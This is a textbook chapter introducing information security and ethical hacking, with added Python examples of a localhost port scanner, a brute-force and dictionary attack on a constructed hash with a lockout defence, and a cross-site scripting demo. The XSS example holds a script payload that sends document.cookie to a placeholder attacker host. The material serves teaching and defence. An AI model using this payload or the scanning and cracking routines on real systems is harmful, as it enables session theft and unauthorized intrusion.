Information Security
Information security (sometimes shortened to InfoSec) is the practice of protecting an
organization's data from unauthorized access, use, disclosure, disruption, modification, perusal,
inspection, recording or destruction. In short, it is the protection of the confidentiality,
integrity, and availability of company data and information. All of the information an
organization stores, sends, receives, and refers to must be protected against accidental or
deliberate modification and must be available in a timely fashion.
Employee social security numbers and addresses, confidential company financial data, trade
secrets, customer data, intellectual property: the list is endless, and each of these examples is
data that must be protected. The protection of information is not new. What is new is the
importance of protecting it and the consequences of failing to do so, or of having its security
compromised. As more and more of this information is stored and processed electronically and
transmitted across networks or the internet, the risk of unauthorized access grows, and so does
the challenge of how best to protect it.
Why protect data?
Would you leave your home for work without locking it? Possibly turning on an alarm for
additional protection? How about your car? When you park it at the mall, do you lock it? Is it
also armed by a security system? Why do you do this? To protect your assets.
Similarly, an organization must protect its assets. An asset is anything of value, including
trademarks, patents, secret recipes, durable goods, data files, competent personnel, clients, and
so on. Every asset has data associated with it, and that data must be protected.
To fully understand why information security is important, an organization first needs to
understand both the value of information and the consequences of such information being
compromised.
When information is not adequately protected, it may be compromised; this is known as an
information or security breach. The consequences can be severe. For businesses, a breach usually
entails large financial penalties, expensive lawsuits, and loss of reputation and business.
Organizations must protect against unauthorized disclosure for a variety of reasons, the most
important being (a) legal and (b) competitive ones. If poor security practices allow damage to
your systems, you may be subject to criminal or civil legal proceedings. Negligence in protecting
your data can compromise your systems, and if third parties are affected, the legal consequences
may be more severe still.
Security breaches can result in the theft, pilferage, and redistribution of intellectual property,
which in turn may lead to business loss. Botnets can be used to launch various types of
Denial-of-Service (DoS) and other web-based attacks, which may result in business downtime and
significant loss of revenue. Attackers may steal and sell corporate secrets to competitors or
compromise critical financial information, all of which erodes an organization's competitive
advantage in the market.
Threats to information security
Many people mistakenly believe that the biggest threat to information security comes from
malicious attackers. It is far more likely, however, that the biggest risks come from less obvious
sources. A threat can be natural, such as a flood or earthquake; it can be accidental, such as a
user inadvertently deleting a file; or it can come from disgruntled employees or from individuals
who have mistakenly been granted access to resources they should not be able to reach.
In order to protect itself from threats, an organization first needs to understand what threats it
will be facing in the coming year. With each passing day these threats become more serious and
harder to detect, so it is vital for companies to understand what they can do to best protect
their systems and information.
Top challenges for information security
Worms, viruses, malware: These remain a top challenge, given the many ways to install
malware on systems, including client-side software vulnerabilities. Browsers remain a top
target. Vulnerability exploitation is at the heart of hacking and data breaches, and these
threats typically rely on exploiting a vulnerability to infect a host, particularly in
client-side and third-party applications.
Malicious insiders/ex-employees: Threats are not always from the outside. Statistics show
that up to a fifth of damage comes from desperate or disgruntled employees attempting to
exploit the companies they currently or previously worked for.
Careless/untrained employees: It is estimated that almost half of all damage to
information systems is caused by authorized personnel who are untrained or incompetent,
and this will remain a threat unless companies take action. Policies, procedures, training
and a little technology can make a world of difference in reducing an organization's
exposure to careless insiders.
Infrastructure: Don't discount physical factors such as fire, water, and bad power. They
are a significant threat to information security.
Mobile devices: Mobile devices have become a plague for information security
professionals. Worms and other malware specifically target these devices; one iPhone
worm, for example, stole banking data and enlisted infected devices in a botnet. Theft of
laptops is another major issue: tens of thousands of laptops are stolen each year, and
they often hold sensitive data whose loss must be publicly disclosed as a data breach.
Social networking: Social networking sites carry an element of trust that makes them a
breeding ground for spurious activity such as spam, scams, scareware and a host of other
attacks, and these threats will continue to rise. Identity theft is a major factor here
from an information security perspective.
Social engineering: Social engineering remains a popular tool for cyber criminals, and
phishing is still a popular way of carrying it out.
Zero day exploits: A zero-day (or zero-hour or day zero) attack is an attack that exploits a
previously unknown vulnerability in a computer application, meaning that the attack occurs
on "day zero" of awareness of the vulnerability, before a patch exists. Zero-day exploits
are often delivered through crafted files or web content to compromise the targeted
systems or steal confidential data such as banking passwords and personal identity
information.
Cyber espionage: Most of these incidents involve government bodies and agencies and have
therefore not been a major threat to most individual organizations.
Cloud computing: The shared nature of data in the cloud, and the loss of direct control
organizations have over their data, is a big security risk. Balancing data sharing with
privacy requirements is a tightrope act.
Elements of information security
Confidentiality: Assures that only authorized users can access the information.
Confidentiality breaches may take place because of improper data handling or a hacking
attempt.
Integrity: Assures that information is trustworthy, i.e., that it has not been modified or
destroyed in an unauthorized or accidental way.
Availability: Assures that the systems used for delivering, storing, and processing
information are accessible when needed by authorized users.
Security, functionality and usability triangle
Security sits in a triangle with two other properties of a system: functionality (the features
it provides) and usability (its ease of use). The triangle is used because an increase or
decrease in any one of the three factors affects the other two. When security is increased, the
ball in the triangle (the system's position) moves away from the functionality and ease-of-use
corners.
Ethical hacking
Ethical hacking is a process by which penetration testing of networks and/or computer systems is
performed by an individual called an ethical hacker: a person who is trusted by the organization
and uses the same methods and techniques as a malicious hacker, but with authorization.
Malicious hacking, often referred to simply as hacking, is when a black hat hacker, sometimes
called a cracker, breaks computer security without authorization or uses technology (usually a
computer, phone system or network) for malicious purposes such as vandalism, credit card fraud,
identity theft, piracy, or other illegal activity.
Necessity of ethical hacking
Vulnerability testing and security audits alone cannot ensure that a network is secure. To
ensure the security of a network, a "defense in depth" strategy must be implemented and then
validated by actually penetrating the network to find and expose its vulnerabilities.
Defense in depth is a security strategy in which several protective layers are placed throughout
an information system. It is useful in preventing direct attacks against an information system
and its data, because breaking through one layer only brings the attacker to the next one.
Ethical hacking is necessary because it allows an organization to counter attacks from malicious
hackers by anticipating the methods they could use to break into a system.
Stages of ethical hacking
There are five stages to ethical hacking:
1. Reconnaissance: In this phase, the attacker collects information about the target.
The following are the types of reconnaissance:
o Passive: Gaining information without directly interacting with the target, for
example by searching public records or news releases.
o Active: Interacting with the target directly by any means, for example by making
telephone calls to the help desk or technical department.
2. Scanning: In this phase, the attacker begins to probe the target for vulnerabilities that can
be exploited. It can include the use of war dialers, port scanners, network mapping, ping
sweeps, vulnerability scanners, etc. Attackers extract information such as computer names,
IP addresses, open ports and services, and user accounts in order to launch the attack.
3. Gaining Access: In this phase, the attacker exploits a vulnerability to gain access to the
system.
4. Maintaining Access: In this phase, the attacker keeps access to the system (for example
by installing a backdoor or creating an account) in order to fulfill the purpose of entering
the network.
5. Covering Tracks: In this phase, the attacker attempts to cover their tracks (for example
by clearing or altering logs) so that they cannot be detected or prosecuted under criminal
law.
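The scanning phase in practice, as an added example that is not part of the original chapter: a minimal TCP connect scanner with banner grabbing. So that it runs offline, the script starts its own fake service on an ephemeral localhost port and serves a constructed OpenSSH-style banner; the target address, the banner text and the port list are assumptions for the demonstration, not real hosts. A connect scan completes the full three-way handshake, so it is noisy and will appear in the target's logs; on any system you do not own you need written authorization first.

```python
import socket
import socketserver
import threading
from typing import Dict, List, Optional


class BannerHandler(socketserver.BaseRequestHandler):
    """Constructed target service: greets every client with a fixed banner."""

    def handle(self) -> None:
        self.request.sendall(self.server.banner)


class BannerServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address, banner: bytes) -> None:
        super().__init__(address, BannerHandler)
        self.banner = banner


def start_fake_service(banner: bytes) -> BannerServer:
    """Bind an ephemeral localhost port and serve the banner in the background."""
    server = BannerServer(("127.0.0.1", 0), banner)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def grab_banner(host: str, port: int, timeout: float = 1.0) -> Optional[bytes]:
    """Full TCP connect (three-way handshake) to one port.

    Returns None if the port is closed or filtered, b"" if it is open but
    silent, otherwise the first bytes the service volunteers.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                return sock.recv(256)
            except socket.timeout:
                return b""  # open, but the service waits for the client to speak
    except OSError:  # ConnectionRefusedError, timeout, unreachable host, ...
        return None


def connect_scan(host: str, ports: List[int], timeout: float = 1.0) -> Dict[int, bytes]:
    """Map every port that completed the handshake to its banner."""
    results: Dict[int, bytes] = {}
    for port in ports:
        banner = grab_banner(host, port, timeout)
        if banner is not None:
            results[port] = banner
    return results


def demo() -> Dict[int, bytes]:
    """Scan one open and one closed localhost port; returns {open_port: banner}."""
    server = start_fake_service(b"SSH-2.0-OpenSSH_7.4\r\n")  # constructed banner
    open_port = server.server_address[1]
    # Reserve and release a second ephemeral port so we have one that is
    # almost certainly closed at scan time.
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()
    try:
        return connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for port, banner in demo().items():
        print(f"{port}/tcp open  {banner!r}")
```

The banner is the attacker's first fingerprint of the service version, which is why hardened hosts suppress or genericize banners and why a closed port (connection refused) and a filtered port (timeout) are worth telling apart when interpreting scan output.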
An ethical hacker should have an excellent knowledge of computers and their functioning,
including programming and networking. Since organizations have a variety of operating systems,
such as UNIX, Linux, Windows, and Macintosh, an ethical hacker must be an expert in dealing
with these operating systems. Ethical hackers should also be familiar with a number of hardware
platforms. They should be knowledgeable about security areas and related issues as well.
The ethical hacking engagement itself concludes with two formal phases:
Conduct security evaluation: In this phase, the technical evaluation report is prepared
based on the testing of potential vulnerabilities.
Conclusion: In this phase, the results of the evaluation are communicated to the
organization and corrective action is taken if needed.
Hackers are commonly grouped into three classes:
Black hat hackers (crackers): Computer specialists who use their hacking skills to perform
malicious attacks on information systems.
Gray hat hackers: Hackers who work both offensively and defensively at different times.
They may help defend a network without breaking any laws, but they sometimes act as black
hats, e.g., by breaking into systems without authorization.
White hat hackers (ethical hackers): Skilled practitioners who use their knowledge to
secure information systems, with the owner's authorization.
Hacking terminology
Before we dive into the types and implications of hacker attacks, let's familiarize ourselves
with common hacking terminology.
Brute force: In a brute force attack, an attacker uses software that tries a large number of
key or password combinations until it finds the right one. To resist such attacks, users
should choose passwords that are hard to guess. The classic minimum is six characters
mixing digits and upper- and lower-case letters, but six mixed-case alphanumeric characters
give only 62^6 (about 5.7 x 10^10) possibilities, which an offline attack against a fast hash
can exhaust in around a minute at a billion guesses per second. Current practice therefore
favours much longer passwords or passphrases, deliberately slow password hashes, and rate
limiting or lockout of online login attempts.
DoS attack: A Denial of Service (DoS) attack is mounted with the objective of degrading the
performance of a computer or network, or making it unavailable altogether, so that legitimate
users cannot use it. It is also known as a network saturation attack or bandwidth
consumption attack.
Logic bomb: A logic bomb is a malicious program that executes when a predetermined
event occurs. For example, a logic bomb can execute when a user logs on to a computer
or presses certain keys on the keyboard. It can also execute on a particular date or at a
time specified by the developers.
Port Redirection: The process of redirecting network traffic from one IP address/port to
another IP address/port (also called port forwarding). Attackers use it to tunnel traffic
through a compromised host to systems that are not directly reachable.
Spoofing: Spoofing is a technique that makes a transmission appear to have come from
an authentic source by forging the IP address, email address, caller ID, etc.
Trojan: A Trojan horse is malicious code that masquerades as a normal program. When the
program is run, its hidden code runs as well, e.g., to destroy or scramble data on the disk,
open a backdoor, or steal information.
Virus: A virus is self-replicating code that attaches itself to executable files or
documents and tries to avoid detection. Viruses are often designed to corrupt or delete
data files on the disk.
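The brute force entry above in working code, as an added example that is not from the original chapter: an exhaustive search and a dictionary attack against a constructed salted hash, the keyspace arithmetic behind the six-character warning, and the online-side defence (a lockout after repeated failures). The salt, the three-character secret, the wordlist and the five-failure lockout policy are all constructed for the demonstration; SHA-256 is used only to keep the example dependency-free, where a real system would use a slow hash such as bcrypt, scrypt or Argon2.

```python
import hashlib
import hmac
import itertools
import string
from typing import Dict, List, Optional, Tuple

# Constructed credential store: fixed salt plus a fast hash so the example is
# self-contained. A slow password hash (bcrypt/scrypt/Argon2) makes every guess
# far more expensive for an offline attacker.
SALT = b"constructed-demo-salt"


def hash_password(password: str, salt: bytes = SALT) -> bytes:
    return hashlib.sha256(salt + password.encode("utf-8")).digest()


def verify(password: str, stored: bytes) -> bool:
    # Constant-time comparison so the check itself does not leak information.
    return hmac.compare_digest(hash_password(password), stored)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidates of exactly `length` symbols over an alphabet."""
    return alphabet_size ** length


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time for an offline attacker at a given guess rate."""
    return keyspace(alphabet_size, length) / guesses_per_second


def brute_force(stored: bytes, alphabet: str, max_length: int) -> Tuple[Optional[str], int]:
    """Try every string of length 1..max_length; return (password, attempts)."""
    attempts = 0
    for length in range(1, max_length + 1):
        for candidate in itertools.product(alphabet, repeat=length):
            attempts += 1
            guess = "".join(candidate)
            if verify(guess, stored):
                return guess, attempts
    return None, attempts


def dictionary_attack(stored: bytes, wordlist: List[str]) -> Tuple[Optional[str], int]:
    """Far cheaper than brute force when the password is a common word."""
    for attempts, word in enumerate(wordlist, start=1):
        if verify(word, stored):
            return word, attempts
    return None, len(wordlist)


class LoginGuard:
    """Online defence: refuse further guesses after too many failures.

    The lockout threshold (5 failures) is a constructed policy, not a standard.
    """

    def __init__(self, stored: bytes, max_failures: int = 5) -> None:
        self.stored = stored
        self.max_failures = max_failures
        self.failures = 0

    def attempt(self, password: str) -> str:
        if self.failures >= self.max_failures:
            return "locked"  # even the correct password is refused now
        if verify(password, self.stored):
            self.failures = 0
            return "ok"
        self.failures += 1
        return "denied"


def demo() -> Dict[str, object]:
    alphabet = string.ascii_lowercase + string.digits  # 36 symbols
    stored = hash_password("ab1")  # constructed, deliberately weak secret
    found, attempts = brute_force(stored, alphabet, max_length=3)
    guard = LoginGuard(stored)
    online = [guard.attempt(g) for g in ["zzz", "123", "abc", "pass", "qwerty", "ab1"]]
    return {
        "found": found,
        "attempts": attempts,
        "six_char_mixed_seconds_at_1e9": seconds_to_exhaust(62, 6, 1e9),
        "twelve_char_mixed_years_at_1e9": seconds_to_exhaust(62, 12, 1e9) / (365 * 24 * 3600),
        "online_outcomes": online,
    }
```

Offline, the attacker controls the guess rate, so only password length, alphabet size and hash cost matter; online, the guard turns the attack into a handful of attempts before the account locks, which is why brute force against a login form is mostly a nuisance while a leaked hash database is a real emergency.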
Types of hacker attacks
Operating system attacks: In these attacks, the attacker looks for OS-related
vulnerabilities and uses them to gain access to the network. Examples of OS vulnerabilities
are:
o Buffer overflow vulnerabilities
o Bugs in the operating system
o Unpatched operating systems
Application-level attacks: Much software has poor error checking. Poor or nonexistent
error and input checking in applications leads to attacks such as:
o Buffer overflow attacks
o Active content
o Cross-site scripting
o Denial of service and SYN attacks
Shrink wrap code attacks: When a user installs an OS or application, it comes with many
sample scripts for administrative tasks. Often these scripts are neither customized nor
removed, which leads to default-code or shrink wrap code attacks.
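Cross-site scripting, listed above as an application-level attack, comes down to a missing output-encoding step. The following added example (not code from the original chapter) shows a vulnerable comment renderer beside its hardened form, then parses the rendered markup the way a browser would to confirm which version hands control to the attacker. The comment and author strings are constructed attacker inputs; the `attacker.example` URL is a placeholder.

```python
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple

# Constructed inputs as an attacker might submit them through a comment form.
COOKIE_THEFT = '<script>location="http://attacker.example/?c="+document.cookie</script>'
ATTR_BREAKOUT = '" onmouseover="alert(1)'


def render_unsafe(comment: str, author: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into the markup."""
    return f'<div class="comment" data-author="{author}">{comment}</div>'


def render_safe(comment: str, author: str) -> str:
    """Hardened: escape each value for the context it lands in.

    html.escape covers element text and double-quoted attribute values; a value
    placed inside a <script> block or a URL would need a different encoder.
    """
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'{html.escape(comment, quote=True)}</div>')


class ActiveContentFinder(HTMLParser):
    """Walk rendered markup and record anything a browser would execute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, object]]) -> None:
        if tag == "script":
            self.findings.append("<script> element")
        for name, _value in attrs:
            if name.startswith("on"):  # onmouseover, onerror, onload, ...
                self.findings.append(f"event handler attribute {name}")


def active_content(markup: str) -> List[str]:
    """Return the executable constructs found in `markup` (empty list if inert)."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def demo() -> Dict[str, List[str]]:
    return {
        "unsafe_script": active_content(render_unsafe(COOKIE_THEFT, "alice")),
        "safe_script": active_content(render_safe(COOKIE_THEFT, "alice")),
        "unsafe_attr": active_content(render_unsafe("Nice post", ATTR_BREAKOUT)),
        "safe_attr": active_content(render_safe("Nice post", ATTR_BREAKOUT)),
    }


if __name__ == "__main__":
    for case, findings in demo().items():
        print(f"{case:14s} {findings or 'no active content'}")
```

Note that the attribute case needs no `<` at all: a stray double quote closes the `data-author` value and the rest of the input becomes a new event-handler attribute, which is why escaping only angle brackets is not enough and why the encoder must match the output context.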
Vulnerability research
Vulnerability research is the process of discovering vulnerabilities and design flaws that may
lead to an attack on, or misuse of, an operating system and its applications. Vulnerabilities are
classified by severity level (low, medium, or high) and exploit range (local or remote).
An administrator needs vulnerability research in order to:
Find weaknesses and alert the network administrator before a network attack.
Commonly cited vulnerability research sources include:
CodeRed Center
SecurityTracker
HackerWatch
Symantec
SecurityFocus
TechNet
Security Magazine
SC Magazine
Computerworld
CNET Blogs
Techworld
Security Watch
HackerJournals
CodeRed Center: A comprehensive security portal that security administrators can use for
daily, accurate, up-to-date information on the latest viruses, Trojans, malware, threats,
security tools, risks, and vulnerabilities.
Note that several of the sites listed above are no longer maintained; the primary sources a
practitioner relies on today are vendor security advisories, the CVE list and the National
Vulnerability Database (NVD).
Penetration testing
A penetration test is a method of evaluating the security of a computer system or network by
simulating an attack from a malicious source. This analysis is performed from the position of a
potential attacker and can include active exploitation of security vulnerabilities. The security
issues found, together with an assessment of their impact and often a proposal for mitigation or
a technical solution, are presented to the system owner. The intent of a penetration test is to
determine the feasibility of an attack and the business impact of a successful exploit, if one is
discovered. It is a component of a full security audit.
Need for penetration testing
Attackers are always looking for opportunities to penetrate systems. They employ any number of
automated tools and network attacks looking for holes in your systems. Most attackers use
well-known attacks and exploits, which are entirely preventable. Penetration testing gives IT
management a view of their network from an attacker's point of view. The goal is for the
penetration tester to find ways into the network so that they can be fixed before someone with
less honourable intentions discovers the same holes.
Penetration testing:
Helps an organization adopt best practices to conform to legal and industry regulations
Evaluates the effectiveness of network security devices, such as firewalls, routers, and web
servers.
Penetration tests are classified by how much the testers know about the target:
Blackbox testing is a technique in which the testing team has no knowledge of the
organization's infrastructure. This type of testing is also known as external testing.
The testers or auditors (in this role sometimes called black hats) must first determine the
location and extent of the systems before commencing their analysis. This technique can be
expensive and time consuming.
In this approach, the tester assesses the network infrastructure from a remote location and
is not aware of any internal technologies deployed by the organization. The tester employs a
number of real-world hacker techniques and, by following organized test phases, may reveal
known and unknown vulnerabilities that exist on the network.
Whitebox testing is the opposite: the testing team is given full knowledge of the
infrastructure, such as network diagrams, configurations and source code, so that it can
test more thoroughly in less time. This type of testing is also known as internal testing.
Graybox testing is a combination of whitebox and blackbox testing. This hybrid approach
provides a powerful insight into both internal and external security viewpoints. It requires
an auditor with limited knowledge of the internal system to choose the best way to assess
its overall security. The tester or auditor (in this role sometimes called a gray hat) is
equipped with partial knowledge of the system and designs test cases or test data based on
that knowledge. The gray-box tester typically performs testing to find vulnerabilities in
software and network systems.
Chapter Summary
In this chapter, we learned about elements of information security, top security challenges,
various hacking terminologies and the fundamentals of ethical hacking. We also learned about
the skills required of an ethical hacker, hacktivism, phases of malicious hacking, and types of
hacking attacks. Lastly, we discussed penetration testing and its associated methodologies.
Glossary
Attack
An attack is an action against an information system or network that attempts to violate the
system's security policy.
Authentication
Authentication is the act of establishing or confirming something (or someone) as authentic, i.e.,
claims made by or about the subject are true ("authentification" is a French language variant of
this word).
Authenticity
Authenticity is the characteristic of a communication, document, or any data that ensures it
is genuine and has not been corrupted from the original.
Cracker
A computer expert performing malicious actions
Ethical Hacker
A computer expert securing information
Hacker
A hacker is an intelligent individual with excellent computer skills and the ability to create
and explore computer software and hardware.
Hacktivism
Hacktivism is the act of hacking or breaking into a computer system for a politically or socially
motivated purpose.
Non-repudiation
Non-repudiation ensures that a party to a contract or a communication cannot refuse the
authenticity of their signature on a document or the sending of a message that they generated.
Penetration test
A penetration test is a method of evaluating the security of a computer system or network by
simulating an attack from a malicious source, known as a Black Hat Hacker, or Cracker.
Phreaker
A person who breaks into telephone or other communication systems
Script kiddie
A script kiddie is an individual who uses hacking programs developed by others to attack
information systems and deface Web sites.
Threat
A threat is an indication of a potential undesirable event.
Vulnerability research
Vulnerability research is the process used to discover vulnerabilities and design flaws that will
open an operating system and its applications to attack or misuse.